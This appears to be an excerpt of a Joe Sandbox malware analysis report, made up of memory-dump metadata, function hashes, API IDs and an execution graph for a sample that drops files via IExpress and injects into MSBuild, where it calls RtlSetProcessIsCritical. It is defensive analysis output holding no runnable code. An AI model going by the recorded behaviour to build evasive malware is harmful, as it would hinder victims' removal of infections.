                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1273765764-0
                                                                                                                      • Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                                                      • Instruction ID: 2b0743822b69b65831fb0a50fec03d43d705eeda8c56f5369c45898a9717f2a3
                                                                                                                      • Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                                                      • Instruction Fuzzy Hash: 0B116021A09A86C6EB606B14B41C3F9F7A1FBC9F64F844231EA5E063D5CFBCD1458750
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                                                                      • String ID: Adv
                                                                                                                      • API String ID: 2312377310-921584719
                                                                                                                      • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                      • Instruction ID: 61973a2937fcb746734d0d8d27906051ced1ab4f9b4e712fbdb98fadb6da4351
                                                                                                                      • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                      • Instruction Fuzzy Hash: 7DA18F32A1B252E6F764EB11B44C6F9E7A4BB44B94F95013AF94D83284CFBDE845C720
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                      • API String ID: 1065093856-305352358
                                                                                                                      • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                      • Instruction ID: 10adbdc5e1a60e0d449fe2bd324656b508ed4115a7d96213b0143865853fb3d7
                                                                                                                      • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                      • Instruction Fuzzy Hash: 5731617261A681C6EB51AF10F4487E9F760FB89BA4F844235EA9D47794CFBCD408C710
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *MEMCAB
                                                                                                                      • API String ID: 0-3211172518
                                                                                                                      • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                      • Instruction ID: 28b9a5eed7ec3668b6d52141339b093cab0bb8a419c796fe7a7d4d3a6b0ee1f2
                                                                                                                      • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                      • Instruction Fuzzy Hash: 12311A31A0AB42C5EB50AB11F45C3F9B7A2FB48B90FD54236E95D462A0DFBCE446C720
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 140117192-0
                                                                                                                      • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                                      • Instruction ID: b3930767550f72b2bab4ab4e0d64708fbee892cbcf6200754e68afcf70c33b4c
                                                                                                                      • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                                      • Instruction Fuzzy Hash: 3041FC35A0AB42C1EB50AB18F8983A5B3A4FB89B54FD04135EA8D83764DFBCE154C760
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3260447230-0
                                                                                                                      • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                      • Instruction ID: a3edcfb0b0c71f2c558b05aaf2083ca2b7eba7dd0f527565c81594912ad444ec
                                                                                                                      • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                      • Instruction Fuzzy Hash: 76117762A1AA91C5FB515B11B50C1B9EB91E74DFE1F898374EA5E07784CFACD8408710
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 140117192-0
                                                                                                                      • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                      • Instruction ID: f082983efa458c9db20a031698386d977d24c70c65210982dff5f876034125bf
                                                                                                                      • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                      • Instruction Fuzzy Hash: C821D23590AB42C1E740AF44F8883A9B3B4FB88B54F900036EA8D43764DFBDE154C720
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2776232527-0
                                                                                                                      • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                      • Instruction ID: 3464755c6397ff7a9a64c440a697d202e7f2dd80e6d0b927f4376adb7732ec4a
                                                                                                                      • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                      • Instruction Fuzzy Hash: 56117772A19642D7E7A0AF24F448BB6FBA0FB99B55FC49134E64A42984DF7CD048CB10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2092150811.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                      • Instruction ID: 7f86d53ea597ce332b9a29b22ad167530dc4fcb183d9919e00ea7489049b19cc
                                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                      • Instruction Fuzzy Hash: C501A77020CB0C4FD748EF0CE451AA6B3E0FB85364F10056EE58AC36A1D632E882CB45

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:13%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:16
                                                                                                                      Total number of Limit Nodes:0
                                                                                                                      execution_graph 20613 12e1c6f 20614 12e1c84 20613->20614 20617 5fe9b40 20613->20617 20621 5fe9b31 20613->20621 20618 5fe9b5c 20617->20618 20625 5fe7e84 20618->20625 20622 5fe9b40 20621->20622 20623 5fe7e84 RtlSetProcessIsCritical 20622->20623 20624 5fe9bae 20623->20624 20624->20614 20626 5fe9c10 RtlSetProcessIsCritical 20625->20626 20628 5fe9bae 20626->20628 20628->20614 20629 12e1c31 20630 12e1c3e 20629->20630 20631 12e1bdf 20630->20631 20632 5fe9b40 RtlSetProcessIsCritical 20630->20632 20633 5fe9b31 RtlSetProcessIsCritical 20630->20633 20632->20631 20633->20631

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q$[c}q^
                                                                                                                      • API String ID: 0-1284671543
                                                                                                                      • Opcode ID: 46d7cc12521eab10347415e4c236f0504918a61d6526489810f5ac3ada7a46c6
                                                                                                                      • Instruction ID: 91cc3f899db4e6535be895bde9e089bae6ecbf2a94e4da5cceda162687c4ee9b
                                                                                                                      • Opcode Fuzzy Hash: 46d7cc12521eab10347415e4c236f0504918a61d6526489810f5ac3ada7a46c6
                                                                                                                      • Instruction Fuzzy Hash: 33129034B102158FDB14DF69D488AAEBBF6FF88700B558069E906EB365DB31EC41CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4a75b996c467965c76de47065fa2eb8907d1de89514aecb18575310ca83dfa48
                                                                                                                      • Instruction ID: 51a39c4902b54a47e05a307852cc491c6e10f70842b5642d5721bf94b768479a
                                                                                                                      • Opcode Fuzzy Hash: 4a75b996c467965c76de47065fa2eb8907d1de89514aecb18575310ca83dfa48
                                                                                                                      • Instruction Fuzzy Hash: A712CF74A01229CFDB65DF68D998B9DBBB2FF49300F1085A9D809A7364DB309E85CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5f29239fc6ff40cae9e1dd75500b610d482ce05d2ce1f8e540c06b82c155f64e
                                                                                                                      • Instruction ID: 513912a1b96b4015ef564313ad147c3422818e94242b2a83d6916a8bb78c8739
                                                                                                                      • Opcode Fuzzy Hash: 5f29239fc6ff40cae9e1dd75500b610d482ce05d2ce1f8e540c06b82c155f64e
                                                                                                                      • Instruction Fuzzy Hash: 5512CE74A01229CFDB65DF68D998B9DBBB2FB49300F1085A9D809A7364DB309E85CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3a0b339506133f6bd1a3e401aaa3d82e07f703f9368ebae5d7b5c40f512ea344
                                                                                                                      • Instruction ID: afdef09a137d8e03f482d6bec3af202a04a5986920e84cb29f10f3d8efc7c159
                                                                                                                      • Opcode Fuzzy Hash: 3a0b339506133f6bd1a3e401aaa3d82e07f703f9368ebae5d7b5c40f512ea344
                                                                                                                      • Instruction Fuzzy Hash: BEF1A174A00219CFDB65DF69D994B9DBBB2FF88300F1081AAD909A7364DB315A81DF50

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (bq$d
                                                                                                                      • API String ID: 0-3334038649
                                                                                                                      • Opcode ID: e14ad19d1db3807f7f2f61a71dcc4c97c7880353b4df26a6cccdfad7b7a1257d
                                                                                                                      • Instruction ID: b09542edc6be64b33df7ac30851e1ef5da8097e49d327daf607062aa2b29cf53
                                                                                                                      • Opcode Fuzzy Hash: e14ad19d1db3807f7f2f61a71dcc4c97c7880353b4df26a6cccdfad7b7a1257d
                                                                                                                      • Instruction Fuzzy Hash: 000299347106068FDB20CF59C48496ABBF2FF88310B59C669E56A9B366DB30FC45CB90

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Te^q
                                                                                                                      • API String ID: 0-671973202
                                                                                                                      • Opcode ID: d125a52ade07b3a6a5a913b0de60830313aaae66cf02d81e65bb1462d4d9a25d
                                                                                                                      • Instruction ID: 718d457885f463d544beecaa865afe1cd5a2884d48e88bf2d5c63c21c5687d7d
                                                                                                                      • Opcode Fuzzy Hash: d125a52ade07b3a6a5a913b0de60830313aaae66cf02d81e65bb1462d4d9a25d
                                                                                                                      • Instruction Fuzzy Hash: 7681B374E01208DFCB58DFA9D59499DBBF2BF89310F209169E845AB365DB31AC41CF50

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c^q
                                                                                                                      • API String ID: 0-1660175743
                                                                                                                      • Opcode ID: ef901b4b20a620e699409814a55700ccc466cf3fc76329b14049ab6ec2b0e3f2
                                                                                                                      • Instruction ID: fc7991b013e79a02dbd661ff6399ab7065de35573827fa9284ddf66a6f0d60d7
                                                                                                                      • Opcode Fuzzy Hash: ef901b4b20a620e699409814a55700ccc466cf3fc76329b14049ab6ec2b0e3f2
                                                                                                                      • Instruction Fuzzy Hash: 9FE1AC70E40209AFEB05DFA4D885BEEBBB2FF88300F104459E605BB2A4DB75AD45CB51

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 717 5fe7e84-5fe9caf RtlSetProcessIsCritical 720 5fe9cb6-5fe9cde 717->720 721 5fe9cb1 717->721 721->720
                                                                                                                      APIs
                                                                                                                      • RtlSetProcessIsCritical.NTDLL(?,?), ref: 05FE9CA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4139461506.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5fe0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2695349919-0
                                                                                                                      • Opcode ID: b4c33c9ea278849d49eeb0774decefa1b25d4bd5ef865b3c06620de9c195083c
                                                                                                                      • Instruction ID: 1149e3f07aef3a12e8fb6739308add96da6c6b763451f065d20045171d5a9607
                                                                                                                      • Opcode Fuzzy Hash: b4c33c9ea278849d49eeb0774decefa1b25d4bd5ef865b3c06620de9c195083c
                                                                                                                      • Instruction Fuzzy Hash: ED2178B2901259CFDB10DF9AD580BEEBBF4AF49320F14846AE445B3250C378AA44CFB5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 723 5fe9c08-5fe9c4c 724 5fe9c54-5fe9caf RtlSetProcessIsCritical 723->724 725 5fe9cb6-5fe9cde 724->725 726 5fe9cb1 724->726 726->725
                                                                                                                      APIs
                                                                                                                      • RtlSetProcessIsCritical.NTDLL(?,?), ref: 05FE9CA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4139461506.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5fe0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2695349919-0
                                                                                                                      • Opcode ID: a8f579d25b4371db3dea97c3e7fa8784e37bb79cad43202542911db195bce184
                                                                                                                      • Instruction ID: c49a81d2db3082a9bbc9ba9964700dbb98c706c31b02abe3eb3d6adc06c99ba5
                                                                                                                      • Opcode Fuzzy Hash: a8f579d25b4371db3dea97c3e7fa8784e37bb79cad43202542911db195bce184
                                                                                                                      • Instruction Fuzzy Hash: 602139B6C01259CFDB14CF99D580BEEBBF4AF58320F14846AD495B3650D378AA44CF61
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Te^q
                                                                                                                      • API String ID: 0-671973202
                                                                                                                      • Opcode ID: af609f955de56b11c417d742dc3aed144984d522ebcdf58d19a6bfd3a0e58926
                                                                                                                      • Instruction ID: a3286c1b81e48565a96182ac17de4659164ce3b695b3e26218f546c5e362a357
                                                                                                                      • Opcode Fuzzy Hash: af609f955de56b11c417d742dc3aed144984d522ebcdf58d19a6bfd3a0e58926
                                                                                                                      • Instruction Fuzzy Hash: DC81C674E05248CFDB05DFA9D99899DBBF2BF8A304F1590AAE805AB365D731AC01CF11
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Te^q
                                                                                                                      • API String ID: 0-671973202
                                                                                                                      • Opcode ID: c094fa4f28797e8b2bf26badd35845b6f79de5491f754022766431d8656549e6
                                                                                                                      • Instruction ID: c438a475b70919afeac48d22f7db01988091706024a123acf66940a715089e3c
                                                                                                                      • Opcode Fuzzy Hash: c094fa4f28797e8b2bf26badd35845b6f79de5491f754022766431d8656549e6
                                                                                                                      • Instruction Fuzzy Hash: 0C71A278E01218DFDB58DFA9D59499DBBF2BF89300F209169E809AB365DB31AC41CF40
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Te^q
                                                                                                                      • API String ID: 0-671973202
                                                                                                                      • Opcode ID: 188f241bd68a8b93b179fd4366d4cdebae02e958e8ff8c5643491d1481441eef
                                                                                                                      • Instruction ID: b8a71220d06b15ea19418e65f1a47bdf8d5103b727f5e2beaa1c174ca1c3dbd5
                                                                                                                      • Opcode Fuzzy Hash: 188f241bd68a8b93b179fd4366d4cdebae02e958e8ff8c5643491d1481441eef
                                                                                                                      • Instruction Fuzzy Hash: 50717174E10218CFDB48DFA9D99899DBBF2FF89310F249169E805AB365DB31A801CF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d5e824fce27cbc190c1a2ff7ba5921a40cfa59f1d7ae1ee9c8cb7c75a4f40f6c
                                                                                                                      • Instruction ID: 0630248ef09afff4e20c0cebd677f3a4a67b277ec15e309662f642ec5175a510
                                                                                                                      • Opcode Fuzzy Hash: d5e824fce27cbc190c1a2ff7ba5921a40cfa59f1d7ae1ee9c8cb7c75a4f40f6c
                                                                                                                      • Instruction Fuzzy Hash: 7B41F271E01309CFCB18DFB4E494AAEBBB2BF4A314F20A469D455B7250DB369882CF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 691b2ea3da810c2f93677a2b9ded3b5feb8020c5ad411217d200df075e1bb749
                                                                                                                      • Instruction ID: 06ba3d4e6c8d8044ab589ecbd1c2f63441e32e61bdcb47c28751aec9655a7296
                                                                                                                      • Opcode Fuzzy Hash: 691b2ea3da810c2f93677a2b9ded3b5feb8020c5ad411217d200df075e1bb749
                                                                                                                      • Instruction Fuzzy Hash: A0414D302517015FE316EB24D985B9ABBA2EF81310F84CE6CC1468B6A5DF74F98DCB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cd0eb963b047e38de3256dd1f3bbf712d809dbd84bf65b79839297a1904d0579
                                                                                                                      • Instruction ID: 96d95ac3f11b2377e92986721665fa6d49d72d7ee94f7b0686c3b72b36c6581b
                                                                                                                      • Opcode Fuzzy Hash: cd0eb963b047e38de3256dd1f3bbf712d809dbd84bf65b79839297a1904d0579
                                                                                                                      • Instruction Fuzzy Hash: 62410674E00209DFDB19DFB8D894AAEBBB2FF89300F148429E80577354DB759886CB55
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
